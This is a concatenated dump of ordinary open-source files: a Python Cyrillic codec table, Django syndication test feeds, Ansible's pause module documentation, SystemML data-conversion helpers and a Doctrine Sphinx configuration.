u'\x87' # 0x87 -> <control>
u'\x88' # 0x88 -> <control>
u'\x89' # 0x89 -> <control>
u'\x8a' # 0x8A -> <control>
u'\x8b' # 0x8B -> <control>
u'\x8c' # 0x8C -> <control>
u'\x8d' # 0x8D -> <control>
u'\x8e' # 0x8E -> <control>
u'\x8f' # 0x8F -> <control>
u'\x90' # 0x90 -> <control>
u'\x91' # 0x91 -> <control>
u'\x92' # 0x92 -> <control>
u'\x93' # 0x93 -> <control>
u'\x94' # 0x94 -> <control>
u'\x95' # 0x95 -> <control>
u'\x96' # 0x96 -> <control>
u'\x97' # 0x97 -> <control>
u'\x98' # 0x98 -> <control>
u'\x99' # 0x99 -> <control>
u'\x9a' # 0x9A -> <control>
u'\x9b' # 0x9B -> <control>
u'\x9c' # 0x9C -> <control>
u'\x9d' # 0x9D -> <control>
u'\x9e' # 0x9E -> <control>
u'\x9f' # 0x9F -> <control>
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\u0401' # 0xA1 -> CYRILLIC CAPITAL LETTER IO
u'\u0402' # 0xA2 -> CYRILLIC CAPITAL LETTER DJE
u'\u0403' # 0xA3 -> CYRILLIC CAPITAL LETTER GJE
u'\u0404' # 0xA4 -> CYRILLIC CAPITAL LETTER UKRAINIAN IE
u'\u0405' # 0xA5 -> CYRILLIC CAPITAL LETTER DZE
u'\u0406' # 0xA6 -> CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I
u'\u0407' # 0xA7 -> CYRILLIC CAPITAL LETTER YI
u'\u0408' # 0xA8 -> CYRILLIC CAPITAL LETTER JE
u'\u0409' # 0xA9 -> CYRILLIC CAPITAL LETTER LJE
u'\u040a' # 0xAA -> CYRILLIC CAPITAL LETTER NJE
u'\u040b' # 0xAB -> CYRILLIC CAPITAL LETTER TSHE
u'\u040c' # 0xAC -> CYRILLIC CAPITAL LETTER KJE
u'\xad' # 0xAD -> SOFT HYPHEN
u'\u040e' # 0xAE -> CYRILLIC CAPITAL LETTER SHORT U
u'\u040f' # 0xAF -> CYRILLIC CAPITAL LETTER DZHE
u'\u0410' # 0xB0 -> CYRILLIC CAPITAL LETTER A
u'\u0411' # 0xB1 -> CYRILLIC CAPITAL LETTER BE
u'\u0412' # 0xB2 -> CYRILLIC CAPITAL LETTER VE
u'\u0413' # 0xB3 -> CYRILLIC CAPITAL LETTER GHE
u'\u0414' # 0xB4 -> CYRILLIC CAPITAL LETTER DE
u'\u0415' # 0xB5 -> CYRILLIC CAPITAL LETTER IE
u'\u0416' # 0xB6 -> CYRILLIC CAPITAL LETTER ZHE
u'\u0417' # 0xB7 -> CYRILLIC CAPITAL LETTER ZE
u'\u0418' # 0xB8 -> CYRILLIC CAPITAL LETTER I
u'\u0419' # 0xB9 -> CYRILLIC CAPITAL LETTER SHORT I
u'\u041a' # 0xBA -> CYRILLIC CAPITAL LETTER KA
u'\u041b' # 0xBB -> CYRILLIC CAPITAL LETTER EL
u'\u041c' # 0xBC -> CYRILLIC CAPITAL LETTER EM
u'\u041d' # 0xBD -> CYRILLIC CAPITAL LETTER EN
u'\u041e' # 0xBE -> CYRILLIC CAPITAL LETTER O
u'\u041f' # 0xBF -> CYRILLIC CAPITAL LETTER PE
u'\u0420' # 0xC0 -> CYRILLIC CAPITAL LETTER ER
u'\u0421' # 0xC1 -> CYRILLIC CAPITAL LETTER ES
u'\u0422' # 0xC2 -> CYRILLIC CAPITAL LETTER TE
u'\u0423' # 0xC3 -> CYRILLIC CAPITAL LETTER U
u'\u0424' # 0xC4 -> CYRILLIC CAPITAL LETTER EF
u'\u0425' # 0xC5 -> CYRILLIC CAPITAL LETTER HA
u'\u0426' # 0xC6 -> CYRILLIC CAPITAL LETTER TSE
u'\u0427' # 0xC7 -> CYRILLIC CAPITAL LETTER CHE
u'\u0428' # 0xC8 -> CYRILLIC CAPITAL LETTER SHA
u'\u0429' # 0xC9 -> CYRILLIC CAPITAL LETTER SHCHA
u'\u042a' # 0xCA -> CYRILLIC CAPITAL LETTER HARD SIGN
u'\u042b' # 0xCB -> CYRILLIC CAPITAL LETTER YERU
u'\u042c' # 0xCC -> CYRILLIC CAPITAL LETTER SOFT SIGN
u'\u042d' # 0xCD -> CYRILLIC CAPITAL LETTER E
u'\u042e' # 0xCE -> CYRILLIC CAPITAL LETTER YU
u'\u042f' # 0xCF -> CYRILLIC CAPITAL LETTER YA
u'\u0430' # 0xD0 -> CYRILLIC SMALL LETTER A
u'\u0431' # 0xD1 -> CYRILLIC SMALL LETTER BE
u'\u0432' # 0xD2 -> CYRILLIC SMALL LETTER VE
u'\u0433' # 0xD3 -> CYRILLIC SMALL LETTER GHE
u'\u0434' # 0xD4 -> CYRILLIC SMALL LETTER DE
u'\u0435' # 0xD5 -> CYRILLIC SMALL LETTER IE
u'\u0436' # 0xD6 -> CYRILLIC SMALL LETTER ZHE
u'\u0437' # 0xD7 -> CYRILLIC SMALL LETTER ZE
u'\u0438' # 0xD8 -> CYRILLIC SMALL LETTER I
u'\u0439' # 0xD9 -> CYRILLIC SMALL LETTER SHORT I
u'\u043a' # 0xDA -> CYRILLIC SMALL LETTER KA
u'\u043b' # 0xDB -> CYRILLIC SMALL LETTER EL
u'\u043c' # 0xDC -> CYRILLIC SMALL LETTER EM
u'\u043d' # 0xDD -> CYRILLIC SMALL LETTER EN
u'\u043e' # 0xDE -> CYRILLIC SMALL LETTER O
u'\u043f' # 0xDF -> CYRILLIC SMALL LETTER PE
u'\u0440' # 0xE0 -> CYRILLIC SMALL LETTER ER
u'\u0441' # 0xE1 -> CYRILLIC SMALL LETTER ES
u'\u0442' # 0xE2 -> CYRILLIC SMALL LETTER TE
u'\u0443' # 0xE3 -> CYRILLIC SMALL LETTER U
u'\u0444' # 0xE4 -> CYRILLIC SMALL LETTER EF
u'\u0445' # 0xE5 -> CYRILLIC SMALL LETTER HA
u'\u0446' # 0xE6 -> CYRILLIC SMALL LETTER TSE
u'\u0447' # 0xE7 -> CYRILLIC SMALL LETTER CHE
u'\u0448' # 0xE8 -> CYRILLIC SMALL LETTER SHA
u'\u0449' # 0xE9 -> CYRILLIC SMALL LETTER SHCHA
u'\u044a' # 0xEA -> CYRILLIC SMALL LETTER HARD SIGN
u'\u044b' # 0xEB -> CYRILLIC SMALL LETTER YERU
u'\u044c' # 0xEC -> CYRILLIC SMALL LETTER SOFT SIGN
u'\u044d' # 0xED -> CYRILLIC SMALL LETTER E
u'\u044e' # 0xEE -> CYRILLIC SMALL LETTER YU
u'\u044f' # 0xEF -> CYRILLIC SMALL LETTER YA
u'\u2116' # 0xF0 -> NUMERO SIGN
u'\u0451' # 0xF1 -> CYRILLIC SMALL LETTER IO
u'\u0452' # 0xF2 -> CYRILLIC SMALL LETTER DJE
u'\u0453' # 0xF3 -> CYRILLIC SMALL LETTER GJE
u'\u0454' # 0xF4 -> CYRILLIC SMALL LETTER UKRAINIAN IE
u'\u0455' # 0xF5 -> CYRILLIC SMALL LETTER DZE
u'\u0456' # 0xF6 -> CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
u'\u0457' # 0xF7 -> CYRILLIC SMALL LETTER YI
u'\u0458' # 0xF8 -> CYRILLIC SMALL LETTER JE
u'\u0459' # 0xF9 -> CYRILLIC SMALL LETTER LJE
u'\u045a' # 0xFA -> CYRILLIC SMALL LETTER NJE
u'\u045b' # 0xFB -> CYRILLIC SMALL LETTER TSHE
u'\u045c' # 0xFC -> CYRILLIC SMALL LETTER KJE
u'\xa7' # 0xFD -> SECTION SIGN
u'\u045e' # 0xFE -> CYRILLIC SMALL LETTER SHORT U
u'\u045f' # 0xFF -> CYRILLIC SMALL LETTER DZHE
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
t0in4/django
|
refs/heads/master
|
tests/syndication_tests/feeds.py
|
278
|
from __future__ import unicode_literals
from django.contrib.syndication import views
from django.utils import feedgenerator
from django.utils.timezone import get_fixed_timezone
from .models import Article, Entry
class TestRss2Feed(views.Feed):
title = 'My blog'
description = 'A more thorough description of my blog.'
link = '/blog/'
feed_guid = '/foo/bar/1234'
author_name = 'Sally Smith'
author_email = '[email protected]'
author_link = 'http://www.example.com/'
categories = ('python', 'django')
feed_copyright = 'Copyright (c) 2007, Sally Smith'
ttl = 600
def items(self):
return Entry.objects.all()
def item_description(self, item):
return "Overridden description: %s" % item
def item_pubdate(self, item):
return item.published
def item_updateddate(self, item):
return item.updated
item_author_name = 'Sally Smith'
item_author_email = '[email protected]'
item_author_link = 'http://www.example.com/'
item_categories = ('python', 'testing')
item_copyright = 'Copyright (c) 2007, Sally Smith'
class TestRss2FeedWithGuidIsPermaLinkTrue(TestRss2Feed):
def item_guid_is_permalink(self, item):
return True
class TestRss2FeedWithGuidIsPermaLinkFalse(TestRss2Feed):
def item_guid(self, item):
return str(item.pk)
def item_guid_is_permalink(self, item):
return False
class TestRss091Feed(TestRss2Feed):
feed_type = feedgenerator.RssUserland091Feed
class TestNoPubdateFeed(views.Feed):
title = 'Test feed'
link = '/feed/'
def items(self):
return Entry.objects.all()
class TestAtomFeed(TestRss2Feed):
feed_type = feedgenerator.Atom1Feed
subtitle = TestRss2Feed.description
class TestLatestFeed(TestRss2Feed):
"""
A feed where the latest entry date is an `updated` element.
"""
feed_type = feedgenerator.Atom1Feed
subtitle = TestRss2Feed.description
def items(self):
return Entry.objects.exclude(pk=5)
class ArticlesFeed(TestRss2Feed):
"""
A feed to test no link being defined. Articles have no get_absolute_url()
method, and item_link() is not defined.
"""
def items(self):
return Article.objects.all()
class TestEnclosureFeed(TestRss2Feed):
pass
class TemplateFeed(TestRss2Feed):
"""
A feed to test defining item titles and descriptions with templates.
"""
title_template = 'syndication/title.html'
description_template = 'syndication/description.html'
# Defining a template overrides any item_title definition
def item_title(self):
return "Not in a template"
class TemplateContextFeed(TestRss2Feed):
"""
A feed to test custom context data in templates for title or description.
"""
title_template = 'syndication/title_context.html'
description_template = 'syndication/description_context.html'
def get_context_data(self, **kwargs):
context = super(TemplateContextFeed, self).get_context_data(**kwargs)
context['foo'] = 'bar'
return context
class NaiveDatesFeed(TestAtomFeed):
"""
A feed with naive (non-timezone-aware) dates.
"""
def item_pubdate(self, item):
return item.published
class TZAwareDatesFeed(TestAtomFeed):
"""
A feed with timezone-aware dates.
"""
def item_pubdate(self, item):
# Provide a weird offset so that the test can know it's getting this
        # specific offset and not accidentally getting one from
# settings.TIME_ZONE.
return item.published.replace(tzinfo=get_fixed_timezone(42))
class TestFeedUrlFeed(TestAtomFeed):
feed_url = 'http://example.com/customfeedurl/'
class MyCustomAtom1Feed(feedgenerator.Atom1Feed):
"""
Test of a custom feed generator class.
"""
def root_attributes(self):
attrs = super(MyCustomAtom1Feed, self).root_attributes()
attrs['django'] = 'rocks'
return attrs
def add_root_elements(self, handler):
super(MyCustomAtom1Feed, self).add_root_elements(handler)
handler.addQuickElement('spam', 'eggs')
def item_attributes(self, item):
attrs = super(MyCustomAtom1Feed, self).item_attributes(item)
attrs['bacon'] = 'yum'
return attrs
def add_item_elements(self, handler, item):
super(MyCustomAtom1Feed, self).add_item_elements(handler, item)
handler.addQuickElement('ministry', 'silly walks')
class TestCustomFeed(TestAtomFeed):
feed_type = MyCustomAtom1Feed
|
willthames/ansible
|
refs/heads/devel
|
lib/ansible/modules/utilities/logic/pause.py
|
13
|
# -*- mode: python -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: pause
short_description: Pause playbook execution
description:
- Pauses playbook execution for a set amount of time, or until a prompt is acknowledged. All parameters are optional. The default behavior is to
pause with a prompt.
- >
You can use C(ctrl+c) if you wish to advance a pause earlier than it is set to expire or if you need to abort a playbook run entirely. To continue early:
press C(ctrl+c) and then C(c). To abort a playbook: press C(ctrl+c) and then C(a).
- >
The pause module integrates into async/parallelized playbooks without any special considerations (see also: Rolling Updates). When using pauses with
the C(serial) playbook parameter (as in rolling updates) you are only prompted once for the current group of hosts.
- This module is also supported for Windows targets.
version_added: "0.8"
options:
minutes:
description:
- A positive number of minutes to pause for.
required: false
default: null
seconds:
description:
- A positive number of seconds to pause for.
required: false
default: null
prompt:
description:
- Optional text to use for the prompt message.
required: false
default: null
author: "Tim Bielawa (@tbielawa)"
notes:
- Starting in 2.2, if you specify 0 or negative for minutes or seconds, it will wait for 1 second, previously it would wait indefinitely.
- This module is also supported for Windows targets.
'''
EXAMPLES = '''
# Pause for 5 minutes to build app cache.
- pause:
minutes: 5
# Pause until you can verify updates to an application were successful.
- pause:
# A helpful reminder of what to look out for post-update.
- pause:
prompt: "Make sure org.foo.FooOverload exception is not present"
'''
RETURN = '''
user_input:
description: User input from interactive console
returned: if no waiting time set
type: string
sample: Example user input
start:
description: Time when started pausing
returned: always
type: string
sample: "2017-02-23 14:35:07.298862"
stop:
description: Time when ended pausing
returned: always
type: string
sample: "2017-02-23 14:35:09.552594"
delta:
description: Time paused in seconds
returned: always
type: string
sample: 2
stdout:
description: Output of pause module
returned: always
type: string
sample: Paused for 0.04 minutes
'''
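# Illustrative sketch (not part of the upstream module): how the documented return
# values might be consumed in a playbook; the register name "pause_result" is
# hypothetical.
#
# - pause:
#     seconds: 30
#   register: pause_result
# - debug:
#     msg: "Paused for {{ pause_result.delta }} seconds"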
|
niketanpansare/incubator-systemml
|
refs/heads/master
|
src/main/python/systemml/converters.py
|
5
|
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
__all__ = [
'getNumCols',
'convertToMatrixBlock',
'convert_caffemodel',
'convert_lmdb_to_jpeg',
'convertToNumPyArr',
'convertToPandasDF',
'SUPPORTED_TYPES',
'convertToLabeledDF',
'convertImageToNumPyArr',
'getDatasetMean']
import numpy as np
import pandas as pd
import os
import math
from pyspark.context import SparkContext
from scipy.sparse import coo_matrix, spmatrix, csr_matrix
from .classloader import *
SUPPORTED_TYPES = (np.ndarray, pd.DataFrame, spmatrix)
DATASET_MEAN = {'VGG_ILSVRC_19_2014': [103.939, 116.779, 123.68]}
def getNumCols(numPyArr):
if numPyArr.ndim == 1:
return 1
else:
return numPyArr.shape[1]
def get_pretty_str(key, value):
return '\t"' + key + '": ' + str(value) + ',\n'
def save_tensor_csv(tensor, file_path, shouldTranspose):
w = tensor.reshape(tensor.shape[0], -1)
if shouldTranspose:
w = w.T
np.savetxt(file_path, w, delimiter=',')
with open(file_path + '.mtd', 'w') as file:
file.write('{\n\t"data_type": "matrix",\n\t"value_type": "double",\n')
file.write(get_pretty_str('rows', w.shape[0]))
file.write(get_pretty_str('cols', w.shape[1]))
file.write(get_pretty_str('nnz', np.count_nonzero(w)))
file.write(
'\t"format": "csv",\n\t"description": {\n\t\t"author": "SystemML"\n\t}\n}\n')
def convert_caffemodel(sc, deploy_file, caffemodel_file,
output_dir, format="binary", is_caffe_installed=False):
"""
Saves the weights and bias in the caffemodel file to output_dir in the specified format.
This method does not require caffe to be installed.
Parameters
----------
sc: SparkContext
SparkContext
deploy_file: string
Path to the input network file
caffemodel_file: string
Path to the input caffemodel file
output_dir: string
Path to the output directory
format: string
Format of the weights and bias (can be binary, csv or text)
is_caffe_installed: bool
True if caffe is installed
"""
if is_caffe_installed:
if format != 'csv':
raise ValueError(
'The format ' +
str(format) +
' is not supported when caffe is installed. Hint: Please specify format=csv')
import caffe
net = caffe.Net(deploy_file, caffemodel_file, caffe.TEST)
for layerName in net.params.keys():
num_parameters = len(net.params[layerName])
if num_parameters == 0:
continue
elif num_parameters == 2:
# Weights and Biases
layerType = net.layers[list(
net._layer_names).index(layerName)].type
shouldTranspose = True if layerType == 'InnerProduct' else False
save_tensor_csv(
net.params[layerName][0].data,
os.path.join(
output_dir,
layerName +
'_weight.mtx'),
shouldTranspose)
save_tensor_csv(
net.params[layerName][1].data,
os.path.join(
output_dir,
layerName +
'_bias.mtx'),
shouldTranspose)
elif num_parameters == 1:
# Only Weight
layerType = net.layers[list(
net._layer_names).index(layerName)].type
shouldTranspose = True if layerType == 'InnerProduct' else False
save_tensor_csv(
net.params[layerName][0].data,
os.path.join(
output_dir,
layerName +
'_weight.mtx'),
shouldTranspose)
else:
raise ValueError(
'Unsupported number of parameters:' +
str(num_parameters))
else:
createJavaObject(sc, 'dummy')
utilObj = sc._jvm.org.apache.sysml.api.dl.Utils()
utilObj.saveCaffeModelFile(
sc._jsc,
deploy_file,
caffemodel_file,
output_dir,
format)
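# Example usage (illustrative sketch): export caffemodel weights and biases without
# a local caffe installation; the paths are hypothetical and `sc` is an existing
# SparkContext.
# convert_caffemodel(sc, 'deploy.prototxt', 'model.caffemodel', '/tmp/weights', format='binary')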
def convert_lmdb_to_jpeg(lmdb_img_file, output_dir):
"""
Saves the images in the lmdb file as jpeg in the output_dir. This method requires caffe to be installed along with the lmdb and cv2 packages.
To install the cv2 package, run `pip install opencv-python`.
Parameters
----------
lmdb_img_file: string
Path to the input lmdb file
output_dir: string
Output directory for images (local filesystem)
"""
import lmdb
import caffe
import cv2
lmdb_cursor = lmdb.open(lmdb_img_file, readonly=True).begin().cursor()
datum = caffe.proto.caffe_pb2.Datum()
i = 1
for _, value in lmdb_cursor:
datum.ParseFromString(value)
data = caffe.io.datum_to_array(datum)
output_file_path = os.path.join(output_dir, 'file_' + str(i) + '.jpg')
image = np.transpose(data, (1, 2, 0)) # CxHxW to HxWxC in cv2
cv2.imwrite(output_file_path, image)
i = i + 1
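# Example usage (illustrative sketch): dump an LMDB image database to JPEG files;
# the paths are hypothetical and caffe, lmdb and cv2 must be installed.
# convert_lmdb_to_jpeg('/data/train_lmdb', '/tmp/train_jpeg')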
def convertToLabeledDF(sparkSession, X, y=None):
from pyspark.ml.feature import VectorAssembler
if y is not None:
pd1 = pd.DataFrame(X)
pd2 = pd.DataFrame(y, columns=['label'])
pdf = pd.concat([pd1, pd2], axis=1)
inputColumns = ['C' + str(i) for i in pd1.columns]
outputColumns = inputColumns + ['label']
else:
pdf = pd.DataFrame(X)
inputColumns = ['C' + str(i) for i in pdf.columns]
outputColumns = inputColumns
assembler = VectorAssembler(inputCols=inputColumns, outputCol='features')
out = assembler.transform(sparkSession.createDataFrame(pdf, outputColumns))
if y is not None:
return out.select('features', 'label')
else:
return out.select('features')
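# Example usage (illustrative sketch): build a labeled Spark DataFrame from NumPy
# arrays; `sparkSession` is an existing SparkSession and the data below is made up.
# import numpy as np
# df = convertToLabeledDF(sparkSession, np.random.rand(10, 3), y=np.random.randint(0, 2, 10))
# df.show()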
def _convertSPMatrixToMB(sc, src):
src = coo_matrix(src, dtype=np.float64)
numRows = src.shape[0]
numCols = src.shape[1]
data = src.data
row = src.row.astype(np.int32)
col = src.col.astype(np.int32)
nnz = len(src.col)
buf1 = bytearray(data.tostring())
buf2 = bytearray(row.tostring())
buf3 = bytearray(col.tostring())
createJavaObject(sc, 'dummy')
return sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.convertSciPyCOOToMB(
buf1, buf2, buf3, numRows, numCols, nnz)
def _convertDenseMatrixToMB(sc, src):
numCols = getNumCols(src)
numRows = src.shape[0]
src = np.asarray(src, dtype=np.float64) if not isinstance(src, np.ndarray) else src
# data_type: 0: int, 1: float and 2: double
if src.dtype is np.dtype(np.int32):
arr = src.ravel().astype(np.int32)
dataType = 0
elif src.dtype is np.dtype(np.float32):
arr = src.ravel().astype(np.float32)
dataType = 1
else:
arr = src.ravel().astype(np.float64)
dataType = 2
buf = bytearray(arr.tostring())
createJavaObject(sc, 'dummy')
return sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.convertPy4JArrayToMB(
buf, numRows, numCols, dataType)
def _copyRowBlock(i, sc, ret, src, numRowsPerBlock, rlen, clen):
rowIndex = int(i / numRowsPerBlock)
tmp = src[i:min(i + numRowsPerBlock, rlen), ]
mb = _convertSPMatrixToMB(
sc,
tmp) if isinstance(
src,
spmatrix) else _convertDenseMatrixToMB(
sc,
tmp)
sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.copyRowBlocks(
mb, rowIndex, ret, numRowsPerBlock, rlen, clen)
return i
def convertToMatrixBlock(sc, src, maxSizeBlockInMB=128):
if not isinstance(sc, SparkContext):
raise TypeError('sc needs to be of type SparkContext')
if isinstance(src, spmatrix):
isSparse = True
else:
isSparse = False
src = np.asarray(src, dtype=np.float64) if not isinstance(src, np.ndarray) else src
if len(src.shape) != 2:
src_type = str(type(src).__name__)
raise TypeError('Expected 2-dimensional ' +
src_type +
', instead passed ' +
str(len(src.shape)) +
'-dimensional ' +
src_type)
worstCaseSizeInMB = (8*(src.getnnz()*3 if isSparse else src.shape[0]*src.shape[1])) / 1000000
# Ignoring sparsity for computing numRowsPerBlock for now
numRowsPerBlock = int(
math.ceil((maxSizeBlockInMB * 1000000) / (src.shape[1] * 8)))
if worstCaseSizeInMB <= maxSizeBlockInMB:
return _convertSPMatrixToMB(
sc, src) if isSparse else _convertDenseMatrixToMB(sc, src)
else:
# Since coo_matrix does not have range indexing
src = csr_matrix(src) if isSparse else src
rlen = int(src.shape[0])
clen = int(src.shape[1])
ret = sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.allocateDenseOrSparse(
rlen, clen, isSparse)
[_copyRowBlock(i, sc, ret, src, numRowsPerBlock, rlen, clen)
for i in range(0, src.shape[0], numRowsPerBlock)]
sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.postProcessAfterCopying(
ret)
return ret
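# Example usage (illustrative sketch): convert a SciPy sparse matrix to a SystemML
# MatrixBlock; `sc` is an existing SparkContext and the matrix below is made up.
# import scipy.sparse
# mb = convertToMatrixBlock(sc, scipy.sparse.random(1000, 100, density=0.01, format='csr'))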
def convertToNumPyArr(sc, mb):
if isinstance(sc, SparkContext):
numRows = mb.getNumRows()
numCols = mb.getNumColumns()
createJavaObject(sc, 'dummy')
buf = sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.convertMBtoPy4JDenseArr(
mb)
return np.frombuffer(buf, count=numRows * numCols,
dtype=np.float64).reshape((numRows, numCols))
else:
# TODO: We can generalize this by creating py4j gateway ourselves
raise TypeError('sc needs to be of type SparkContext')
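# Example usage (illustrative sketch): round-trip a small NumPy array through a
# MatrixBlock and back; `sc` is an existing SparkContext.
# import numpy as np
# X = np.random.rand(5, 4)
# assert np.allclose(convertToNumPyArr(sc, convertToMatrixBlock(sc, X)), X)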
# Returns the mean of a model if defined otherwise None
def getDatasetMean(dataset_name):
"""
Parameters
----------
dataset_name: Name of the dataset used to train the model. This is an artificial name based on the dataset used to train the model.
Returns
-------
mean: Mean value of the model if it is defined in DATASET_MEAN, else None.
"""
try:
mean = DATASET_MEAN[dataset_name.upper()]
except BaseException:
mean = None
return mean
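# Example usage (illustrative sketch) for getDatasetMean: look up the per-channel
# mean of the bundled VGG ILSVRC 19 (2014) model; unknown names return None.
# getDatasetMean('vgg_ilsvrc_19_2014')   # [103.939, 116.779, 123.68]
# getDatasetMean('unknown_model')        # None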
# Example usage: convertImageToNumPyArr(im, img_shape=(3, 224, 224), add_rotated_images=True, add_mirrored_images=True)
# The above call returns a numpy array of shape (6, 50176) in NCHW format
def convertImageToNumPyArr(im, img_shape=None, add_rotated_images=False, add_mirrored_images=False,
color_mode='RGB', mean=None):
# Input Parameters
# color_mode: VGG models expect image data in BGR format instead of the RGB format used by most other models;
#             set color_mode='BGR' to convert the image data to BGR format.
# mean: per-channel mean value subtracted from every pixel of the input data.
#       By default it is None, so no mean is subtracted.
if img_shape is not None:
num_channels = img_shape[0]
size = (img_shape[1], img_shape[2])
else:
num_channels = 1 if im.mode == 'L' else 3
size = None
if num_channels != 1 and num_channels != 3:
raise ValueError('Expected the number of channels to be either 1 or 3')
from PIL import Image
if size is not None:
im = im.resize(size, Image.LANCZOS)
expected_mode = 'L' if num_channels == 1 else 'RGB'
if expected_mode != im.mode:
im = im.convert(expected_mode)
def _im2NumPy(im):
if expected_mode == 'L':
return np.asarray(im.getdata()).reshape((1, -1))
else:
im = (np.array(im).astype(np.float))
# (H,W,C) -> (C,H,W)
im = im.transpose(2, 0, 1)
# RGB -> BGR
if color_mode == 'BGR':
im = im[::-1, :, :]
# Subtract Mean
if mean is not None:
for c in range(3):
im[c, :, :] = im[c, :, :] - mean[c]
# (C,H,W) --> (1, C*H*W)
return im.reshape((1, -1))
ret = _im2NumPy(im)
if add_rotated_images:
ret = np.vstack(
(ret, _im2NumPy(
im.rotate(90)), _im2NumPy(
im.rotate(180)), _im2NumPy(
im.rotate(270))))
if add_mirrored_images:
ret = np.vstack(
(ret, _im2NumPy(
im.transpose(
Image.FLIP_LEFT_RIGHT)), _im2NumPy(
im.transpose(
Image.FLIP_TOP_BOTTOM))))
return ret
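# Example usage (illustrative sketch): load an image with PIL and convert it for a
# VGG-style model, subtracting the dataset mean; 'cat.jpg' is a hypothetical file.
# from PIL import Image
# arr = convertImageToNumPyArr(Image.open('cat.jpg'), img_shape=(3, 224, 224),
#                              color_mode='BGR', mean=getDatasetMean('VGG_ILSVRC_19_2014'))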
def convertToPandasDF(X):
if not isinstance(X, pd.DataFrame):
return pd.DataFrame(X, columns=['C' + str(i)
for i in range(getNumCols(X))])
return X
|
itkg-dmoate/projetsynfony
|
refs/heads/master
|
vendor/doctrine/orm/docs/en/conf.py
|
2448
|
# -*- coding: utf-8 -*-
#
# Doctrine 2 ORM documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 3 18:10:24 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('_exts'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['configurationblock']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Doctrine 2 ORM'
copyright = u'2010-12, Doctrine Project Team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2'
# The full version, including alpha/beta/rc tags.
release = '2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'doctrine'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
